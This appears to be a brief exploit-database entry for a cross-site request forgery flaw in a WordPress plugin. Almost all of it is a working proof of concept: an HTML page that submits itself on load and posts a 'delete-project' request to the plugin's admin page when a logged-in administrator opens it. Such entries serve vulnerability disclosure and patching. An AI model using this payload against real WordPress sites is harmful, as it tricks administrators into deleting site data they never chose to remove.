Share
## https://sploitus.com/exploit?id=WPEX-ID:D4980886-DA10-4BBC-A84A-FE071AB3B755
Make a logged in admin open an HTML file containing (where `<<ID>>` is a valid ID):

```
<body onload="document.forms[0].submit()">
    <form action="http://example.com/wp-admin/admin.php?page=kkpb-menu" method="post">
        <input type="hidden" name="action" value="delete-project">
        <input type="hidden" name="id" value="<<ID>>">
    </form>
</body>
```